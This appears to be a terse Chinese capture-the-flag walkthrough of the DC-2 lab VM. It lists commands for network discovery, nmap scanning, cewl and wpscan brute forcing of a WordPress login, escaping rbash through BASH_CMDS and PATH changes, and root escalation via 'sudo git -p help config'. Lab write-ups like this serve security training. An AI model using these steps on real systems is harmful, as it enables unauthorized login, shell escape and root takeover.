目录
搭建靶场
靶场下载地址
下载解压文件,并使用虚拟机软件 创建目标
发现目标
netdiscover -r 192.168.226.0/24
发现目标对象 为 :192.168.226.140
信息收集
nmap -sS -sV -A -T4 -p- 192.168.226.139
使用nmap查看目标 开启了那些端口与服务
指纹信息收集 报错
使用BurpSuite分析
发现强跳dc-2
将dc-2 写入hosts
直接访问dc-2
网站cms收集
网站目录扫描
漏洞利用
Flag1
网站首页 有flag 直接访问
Flag2
根据flag1提示使用cewl 生成 密码字典
cewl http://dc-2/ -w password.txt
有了密码字典 那应该有登录框 此时想到在目录扫描过程中的后台登录
有了密码字典 还需要用户字典,网站采用wordpress 可以通过wpscan进行用户探测
wpscan --url http://dc-2 --enumerate u
对站点进行穷举
wpscan --url http://dc-2/ -U user.txt -P password.txt
成功获取账号与密码
登入后台找到flag
Flag3
根据提示 可以通过其他途径获取进入的通道 此时想起ssh登入端口为7744
使用cat命令 受限
改用vi命令编辑
Flag4
根据提示需要找到jerry目录
绕过rbash限制
export -p
BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
找到flag
Flag5
根据提示使用git提权
sudo git -p help config
!/bin/sh
在root目录下找到flag